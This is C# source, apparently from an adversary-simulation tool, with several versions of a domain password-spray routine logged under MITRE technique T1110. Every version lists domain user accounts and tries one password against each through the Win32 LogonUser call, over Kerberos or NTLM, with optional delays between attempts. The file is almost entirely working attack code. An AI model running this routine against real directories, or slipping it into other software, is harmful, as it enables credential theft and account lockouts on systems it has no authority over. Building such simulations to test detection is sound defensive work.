public static void LocalDomainPasswordSpray(int usertype, int nuser, int protocol, int sleep, string password)
{
bool Kerberos = new bool();
List <User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser);
switch (protocol)
{
case 1:
Kerberos = true;
break;
case 2:
Kerberos = false;
break;
default:
return;
}
Console.WriteLine("[*] Obtained {0} user accounts", usertargets.Count);
String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
if (usertype == 7)
{
domain = ".";
}
Console.WriteLine("[*] Starting Domain Password Spray Attack on {0}", Environment.MachineName);
if (sleep > 0)
{
Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
}
foreach (var user in usertargets)
{
if (Kerberos)
{
CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 0);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
else
{
CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 2);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
}
}
public static void LocalDomainPasswordSpray(PlaybookTask playbook_task, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Logger(currentPath + log);
logger.SimulationHeader("T1110.003");
logger.TimestampInfo(String.Format("Local Domain Brute Force using the LogonUser Win32 API function"));
logger.TimestampInfo(String.Format("Using {0}", playbook_task.protocol));
try
{
List <User> usertargets = Targets.GetUserTargets(playbook_task, logger);
if (playbook_task.task_sleep > 0)
{
logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", playbook_task.task_sleep));
}
String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
//if (playbook_task.user_target_type == 6) domain = ".";
foreach (var user in usertargets)
{
if (playbook_task.protocol.ToUpper().Equals("KERBEROS"))
{
CredAccessHelper.LogonUser(user.UserName, domain, playbook_task.spray_password, 2, 0, logger);
if (playbook_task.task_sleep > 0)
{
Thread.Sleep(playbook_task.task_sleep * 1000);
}
}
else
{
CredAccessHelper.LogonUser(user.UserName, domain, playbook_task.spray_password, 2, 2, logger);
if (playbook_task.task_sleep > 0)
{
Thread.Sleep(playbook_task.task_sleep * 1000);
}
}
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void LocalDomainPasswordSpray(int usertype, int nuser, int protocol, int sleep, string password, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1110");
//logger.TimestampInfo(String.Format("Starting T1110 Simulation on {0}", Environment.MachineName));
//logger.TimestampInfo(String.Format("Simulation agent running as {0} with PID:{1}", System.Reflection.Assembly.GetEntryAssembly().Location, Process.GetCurrentProcess().Id));
logger.TimestampInfo(String.Format("Local Domain Brute Force"));
bool Kerberos = new bool();
try
{
List <User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser);
switch (protocol)
{
case 1:
Kerberos = true;
break;
case 2:
Kerberos = false;
break;
default:
return;
}
//Console.WriteLine("[*] Obtained {0} user accounts", usertargets.Count);
logger.TimestampInfo(String.Format("Obtained {0} user accounts", usertargets.Count));
String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
if (usertype == 7)
{
domain = ".";
}
//Console.WriteLine("[*] Starting Domain Password Spray Attack on {0}", Environment.MachineName);
//if (sleep > 0) Console.WriteLine("[*] Sleeping {0} seconds between attempt", sleep);
foreach (var user in usertargets)
{
if (Kerberos)
{
CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 0, logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
else
{
CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 2, logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
public static void LocalDomainPasswordSpray(int nuser, int sleep, string password, string log)
{
string currentPath = AppDomain.CurrentDomain.BaseDirectory;
Lib.Logger logger = new Lib.Logger(currentPath + log);
logger.SimulationHeader("T1110.003");
logger.TimestampInfo(String.Format("Local Domain Brute Force using the LogonUser Win32 API function"));
bool Kerberos = new bool();
try
{
var rand = new Random();
//int usertype = rand.Next(1, 7);
int usertype = 1;
List <User> usertargets = Lib.Targets.GetUserTargets(usertype, nuser, logger);
//int protocol = rand.Next(1, 3);
int protocol = 2;
switch (protocol)
{
case 1:
Kerberos = true;
break;
case 2:
Kerberos = false;
break;
default:
return;
}
logger.TimestampInfo(String.Format("Obtained {0} user accounts", usertargets.Count));
if (sleep > 0)
{
logger.TimestampInfo(String.Format("Sleeping {0} seconds between attempt", sleep));
}
String domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
if (usertype == 6)
{
domain = ".";
}
foreach (var user in usertargets)
{
if (Kerberos)
{
CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 0, logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
else
{
CredAccessHelper.LogonUser(user.UserName, domain, password, 2, 2, logger);
if (sleep > 0)
{
Thread.Sleep(sleep * 1000);
}
}
}
logger.SimulationFinished();
}
catch (Exception ex)
{
logger.SimulationFailed(ex);
}
}
